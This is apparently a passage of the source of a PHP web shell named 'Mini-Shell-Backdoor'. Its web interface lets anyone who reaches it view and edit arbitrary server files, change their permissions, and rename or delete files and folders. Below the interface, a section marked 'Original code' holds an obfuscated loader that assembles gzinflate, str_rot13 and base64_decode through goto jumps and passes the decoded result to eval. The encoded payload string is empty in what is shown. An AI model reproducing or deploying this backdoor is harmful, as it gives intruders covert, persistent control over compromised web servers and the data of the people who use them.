                echo "<div class='container alert'>\n            <center><h4 class=\"text-white\">{ Edit File }</h4></center>\n            <form method='POST'>\n                <div class=\"mb-3\">\n                    <label for=\"exampleFormControlTextarea1\" class=\"text-white form-label\">Code :</label>\n                    <textarea class=\"form-control\" id=\"exampleFormControlTextarea1\" rows=\"20\" name=\"src\">" . htmlspecialchars(file_get_contents($_GET["dirf"])) . "</textarea><a href=\"?Home\" type=\"button\" class=\"tutup btn-close\" data-bs-dismiss=\"alert\" aria-label=\"Close\"></a>\n                </div>\n                <button name=\"save\" class=\"tombol btn btn-outline-secondary\" type=\"submit\">Simpan</button>\n            </form>\n            <br>\n            <button type=\"button\" class=\"tombol btn btn-danger\" data-bs-dismiss=\"alert\" aria-label=\"Close\">Cancel</button>\n            </div>";
            }
            function perms($file)
            {
                $perms = fileperms($file);
                if (($perms & 49152) == 49152) {
                    $info = "s";
                } elseif (($perms & 40960) == 40960) {
                    $info = "l";
                } elseif (($perms & 32768) == 32768) {
                    $info = "-";
                } elseif (($perms & 24576) == 24576) {
                    $info = "b";
                } elseif (($perms & 16384) == 16384) {
                    $info = "d";
                } elseif (($perms & 8192) == 8192) {
                    $info = "c";
                } elseif (($perms & 4096) == 4096) {
                    $info = "p";
                } else {
                    $info = "u";
                }
                $info .= $perms & 256 ? "r" : "-";
                $info .= $perms & 128 ? "w" : "-";
                $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-");
                $info .= $perms & 32 ? "r" : "-";
                $info .= $perms & 16 ? "w" : "-";
                $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-");
                $info .= $perms & 4 ? "r" : "-";
                $info .= $perms & 2 ? "w" : "-";
                $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-");
                return $info;
            }
            if ($_GET["aksi"] == "chmod") {
                if (isset($_POST["ganti"])) {
                    if (chmod($_GET["nama_file"], $_POST["perm"])) {
                        echo "<script>Swal.fire(\n                        'Berhasil',\n                        'Permission Sukses Diganti',\n                        'success'\n                    ); window.location='?path=" . $path . "';</script>";
                    } else {
                        echo "<script>Swal.fire(\n                        'Gagal',\n                        'Permission Gagal Diganti',\n                        'error'\n                    ); window.location='?path=" . $path . "';</script>";
                    }
                }
                echo "<div class=\"alert\"><center><h4 class=\"text-white\">{ Ganti Permission }</h4></center>\n                <form method=\"POST\">\n                    <div class=\"mb-3\">\n                        <label for=\"exampleFormControlInput1\" class=\"text-white form-label\">Permission :</label>\n                        <input type=\"text\" name=\"perm\" value=\"" . substr(sprintf("%o", fileperms($_GET["dirf"])), -4) . "\" class=\"form-control\" id=\"exampleFormControlInput1\" placeholder=\"name@example.com\">\n                    </div>\n                    <br>\n                    <button type=\"submit\" name=\"ganti\" class=\"tombol btn btn-outline-success\">Ganti Permission</button>\n                </form>\n                <br>\n                <button type=\"button\" class=\"tombol btn btn-danger\" data-bs-dismiss=\"alert\" aria-label=\"Close\">Cancel</button>\n                </div>";
            }
            ?>
    <br>
        <div class="table-responsive-sm">
        <table class="table table-dark table-hover table-sm table-borderless">
            <thead>
                <tr>
                    <th scope="col-">Type</th>
                    <th scope="col">Name</th>
                    <th scope="col">Size</th>
                    <th scope="col">Last Modified</th>
                    <th scope="col">Permission</th>
                    <th scope="col">options</th>
                </tr>
            </thead>
            <tbody>
                <?php 
            foreach ($scandir as $direktori) {
                if ($direktori != "." && $direktori != "..") {
                    if (is_dir($direktori)) {
                        echo "<tr>\n                            <th scope=\"row\"><font size='5'><i class=\"bi bi-folder-fill\"></i></font></th>\n                            <td><a class=\"path\" nama='filenya' href=\"?path=" . $path . "/" . $direktori . "\">" . $direktori . "</a></td>\n                            <td><i class=\"bi bi-dash-lg\"></i></td>\n                            <td>" . date("d F Y H:i:s.", filemtime($direktori)) . "</td>\n                            <td>";
                        if (is_writable($path . "/" . $direktori)) {
                            echo "<font color=\"#2EFF00\">";
                        } elseif (!is_readable($path . "/" . $direktori)) {
                            echo "<font color=\"#FF5733\">";
                        }
                        echo perms($path . "/" . $direktori);
                        if (is_writable($path . "/" . $direktori) || !is_readable($path . "/" . $direktori)) {
                            echo "</font>";
                        }
                        echo "</td>\n                            <td>\n                                <a href='?path=" . $path . "&aksi=rename&dirf=" . $path . "/" . $direktori . "&nama_file=" . $direktori . "' class=\"btn btn-outline-warning\"><i class=\"bi bi-pencil\"></i></a>\n                                <a href='?path=" . $path . "&aksi=chmod&dirf=" . $path . "/" . $direktori . "&nama_file=" . $direktori . "' class=\"btn btn-outline-light\"><i class=\"bi bi-cursor-fill\"></i></a>\n                                <a href='?path=" . $path . "&aksi=delete&dirf=" . $path . "/" . $direktori . "&nama_file=" . $direktori . "' class=\"btn btn-outline-danger\"><i class=\"bi bi-trash-fill\"></i></a>\n                            </td>\n                        </tr>";
                    }
                }
            }
            function fsize($file)
            {
                $a = array("B", "KB", "MB", "GB", "TB", "PB");
                $pos = 0;
                $size = filesize($file);
                while ($size >= 1024) {
                    $size /= 1024;
                    $pos++;
                }
                return round($size, 2) . " " . $a[$pos];
            }
            foreach ($scandir as $file) {
                if ($file != "." && $file != "..") {
                    if (is_file($file)) {
                        echo "<tr>\n                                <th scope=\"row\"><font size='5'><i class=\"bi bi-file-earmark-code-fill\"></i></font></th>\n                                <td>\n                                <a class=\"path\" nama='filenya' href=\"?path=" . $path . "&aksi=view&path_file=" . $path . "/" . $file . "\">" . $file . "</a>\n                                </td>\n                                <td>" . fsize($file) . "</td>\n                                <td>" . date("d F Y H:i:s", filemtime($file)) . "</td>\n                                <td>";
                        if (is_writable($path . "/" . $file)) {
                            echo "<font color=\"#2EFF00\">";
                        } elseif (!is_readable($path . "/" . $file)) {
                            echo "<font color=\"#FF5733\">";
                        }
                        echo perms($path . "/" . $file);
                        if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) {
                            echo "</font>";
                        }
                        echo "</td>\n                                <td>\n                                    <a href='?path=" . $path . "&aksi=edit&dirf=" . $path . "/" . $file . "&nama_file=" . $file . "' class=\"btn btn-outline-success\"><i class=\"bi bi-pencil-square\"></i></a>\n                                    <a href='?path=" . $path . "&aksi=rename&dirf=" . $path . "/" . $file . "&nama_file=" . $file . "' class=\"btn btn-outline-warning\"><i class=\"bi bi-pencil\"></i></a>\n                                    <a href='?path=" . $path . "&aksi=chmod&dirf=" . $path . "/" . $file . "&nama_file=" . $file . "' class=\"btn btn-outline-light\"><i class=\"bi bi-cursor-fill\"></i></a>\n                                    <a href='?path=" . $path . "&aksi=delete&dirf=" . $path . "/" . $file . "&nama_file=" . $file . "' class=\"btn btn-outline-danger\"><i class=\"bi bi-trash-fill\"></i></a>\n                                </td>\n                            </tr>";
                    }
                }
            }
            if ($_GET["aksi"] == "delete") {
                if (is_dir($_GET["dirf"])) {
                    if (is_writable($path)) {
                        rmdir($_GET["nama_file"]);
                        echo "<script>alert('Selamat Anda Berhasil Men-delete Folder');window.location='?path=" . $path . "'</script>";
                    } else {
                        echo "<script>alert('Maaf Anda Gagal Men-delete Folder')</script>";
                    }
                }
                if (is_file($_GET["dirf"])) {
                    if (unlink($_GET["nama_file"])) {
                        echo "<script>alert('Selamat Anda Berhasil Men-delete File');window.location='?path=" . $path . "';</script>";
                    } else {
                        echo "<script>alert('Maaf Anda Gagal Men-delete File'); window.location='?path=" . $path . "';</script>";
                    }
                }
            }
            ?>
                </tbody>
        </table>
        <a href="#up"><i class="bi bi-chevron-up up-icon"></i></a>
        </div>
    </div>
    <a class="btn btn-dark" data-bs-toggle="collapse" href="#collapseExample1" role="button" aria-expanded="false" aria-controls="collapseExample">
        <i class="bi bi-question-circle"></i> Legends <i class="bi bi-chevron-down"></i>
    </a>
    <div class="collapse" id="collapseExample1">
        <div class="card card-body bg-dark text-white">
            <?php 
            echo "\n                 <font width='15%'><a class=\"btn btn-outline-success\"><i class=\"bi bi-pencil-square\"></i></a> : Edit File</font>\n                 <font width='15%'><a class=\"btn btn-outline-warning\"><i class=\"bi bi-pencil\"></i></a> : rename File</font>\n                 <font width='15%'><a class=\"btn btn-outline-light\"><i class=\"bi bi-cursor-fill\"></i></a> : Chmod File</font>\n                 <font width='15%'><a class=\"btn btn-outline-danger\"><i class=\"bi bi-trash-fill\"></i></a> : Delete File</font>\n                 ";
            ?>
         </div>
    </div>
    <!-- akhir list file/folder -->

    <br>
    <div class="footer">
        <center>
            <?php 
            echo "<font color='white' size='5'><a class='text-white text-decoration-none' href='https://github.com/FierzaEriez/Mini-Shell-Backdoor'><i class=\"bi bi-github\"></i></a> <i class=\"bi bi-facebook\"></i> <i class=\"bi bi-instagram\"></i></font><font color='white'><hr width='55%'></font><br><br><p class=\"info\">Design & Developed By FierzaXploit <br> Copyright © ";
            echo date("Y") . "</p>";
            ?>
        </center>
    </div>
    </div>
    </div>
    <br>

    <!-- Optional JavaScript; choose one of the two! -->

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
</body>
</html><?php 
        };
    };
};
@null;
exit;


Original code

<?=/*!*/@/**8**/null; echo@null;goto O4809;O6131:$O8797='o';goto O5881;O7094:$O5319='n';goto O4845;O8585:$O1333='f';goto O9593;O5239:$O3361=$O5305.$O9000.$O4994.$O5319.$O1333.$O8539.$O8018.$O3314.$O4387;goto O2817;O3463:$O9000='z';goto O9339;O5881:$O9366='v';goto O6846;O2817:$O7244=$O9467.$O8018.$O7407.$O4387.$O1860.$O9137.$O9705.$O2275.$O4387.$O0763.$O8797.$O2275.$O4387;goto O8251;O0032:$O4994='i';goto O3463;O3774:$O9705='_';goto O7261;O6231:$O9467='b';goto O2749;O4157:$O8539='l';goto O7032;O2749:$O8018='a';goto O3774;O9593:$O4387='e';goto O3270;O7378:$O1860='6';goto O6131;O7261:$O6447=$O7407.$O3314.$O5781.$O5781.$O4387.$O9366;goto O5239;O9490:$O3314='t';goto O6231;O6846:$O9137='4';goto O7094;O3270:$O2275='d';goto O9490;O4809:$O5305='g';goto O0032;O4845:$O7407='s';goto O4157;O9339:$O0763='c';goto O7378;O7032:$O5781='r';goto O8585;O8251:eval($O3361($O6447($O7244(''))));@null;exit;